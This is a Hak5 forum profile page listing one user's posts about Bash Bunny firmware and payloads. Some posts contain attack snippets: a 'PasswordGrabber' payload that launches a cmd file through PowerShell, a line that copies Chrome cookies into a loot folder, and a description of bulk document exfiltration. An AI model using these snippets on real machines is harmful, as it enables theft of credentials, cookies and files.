Jump to content

Opticon

Active Members
  • Content Count

    19
  • Joined

  • Last visited

About Opticon

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Hello again @datguy_dev ! As @Dave-ee Jones suggested, you may be able to resolve it using my method. However, I am not daft nor ignorant, as you wrote; I'm truly sorry for your situation, as I have exhausted all options. Put in a word to Hak5 and see about an exchange.
  2. @datguy_dev Well guess what? Mine did the same thing. It was just as you wrote; "there is a duration of time of when the BB is left unplugged - that when plugged back into a power source - that produces different boot sequences for the BB." So, I'll tell you when this started becoming an issue, not to mention I lost the ability to use payloads in switch position 2. I was advised to update to firmware 1.3, as new features had been made available. I was running the out-of-box- 1.0 without incident. After writing and researching, I changed to a firmware that I hadn't used, as recovery mode would not work- contrary to what is in writing. Firmware 1.2 resolved it. Every single time I use it, it operates the same, with no random lights at boot or disconnection from my system, and I can leave it plugged in for hours. So contrary to any advice given on the board, I will not use 1.3 as it caused a myriad of problems including everything you wrote and more! -Cheers
  3. Just a quick question, @Mrnoname. The Bunny is convenient and essentially useable as it is a USB device. Thus, any computer is vulnerable as long as they have USB ports- never seen one yet that doesn't. How practical would a device with an HDMI interface be in the world of pentesters? Better yet, can you name a single instance where this would be of use, and please don't write back Kodi. -Cheers
  4. Great work @couchTornado! I hope you received my message. Also, @WiFiJuice posted a great keyboard map for the Swedish layout, and like so many others confirmed that the one being downloaded is incorrect and or corrupt. Good luck with this firmware issue- I refuse to go to 1.3 because it renders all Mac payloads useless.
  5. Opticon

    macinfograbber

    Thank you @unixnerd777 and @couchTornado. When I am finished with the rewrite of the original, I'll be sure to add these details to the payload.
  6. @WiFiJuice You bring up an excellent point, one that I would wished the developers would have anticipated. Hopefully, as you've addressed this problem before, they will look into resolving language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.
  7. Well @WiFiJuice I'll get working on it. However, here's a pertinent question, what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3. Restores and switches that won't execute payloads etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer. -Cheers
  8. For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)
  9. @WiFiJuice The DM has been sent and I hope you enjoy it! Let me know if there's anything you would add or subtract from the payload. Cheers!
  10. @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone!
  11. Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know- it works on them all! However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as: Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s Setup a network listener on port 2196 for testing: /usr/bin/nc -l 2196 Capture some packets: tcpdump -nS Capture all the packets:tcpdump -nnvvXS Capture the packets for a given port: tcpdump -nnvvXs 548 These are just a couple of things to consider while I toil away with a proper OSX NMAP hack. Cheers!
  12. @WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)
  13. Opticon

    Violation of CoC

    @Dave-ee Jones @illwill Thank you for everything you provided. The code for PasswordGrabber is as follows: LED ATTACK ATTACKMODE HID STORAGE DUCKY_LANG se RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" LED FINISH Can I simply replace the d.cmd file with the one used in WifiCreds? Or do I need to retool the powershell code also? Thanks again!
  14. Opticon

    Violation of CoC

    @illwillYou have placed so much effort into this, as has Sally Vendeven. Unfortunately, neither of these work on three Windows 10 boxes and four VMs. Sadly, running a.cmd does exactly what this payload proposes to do, but you must execute it manually. So, if I'm left with no other option, using several scenarios, how do I make a simple payload that calls upon a.cmd? Seriously! After months of coding and comparing, the Windows-based command works effortlessly. Let it do just that, and teach us all how to call upon that file in the beginning and leave it there. Please get back to me at your convenience, as I appreciate your time. -Opticon
  15. So, when using macinfograbber it doesn't work unless I comment out the following lines: QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db Upon further inspection, I located my Cookies file on all of my Macs. It's here: /Library/Application\\ Support/Google/Chrome/Profile\\ 3/Cookies Is there anything I can do to change this? Meaning, are all of my computers unique in some way, or is this normal Chrome file placement, and can code be added to look for all profile folders and the cookie files therein? Thanks in advance! -Cheers!
×
×
  • Create New...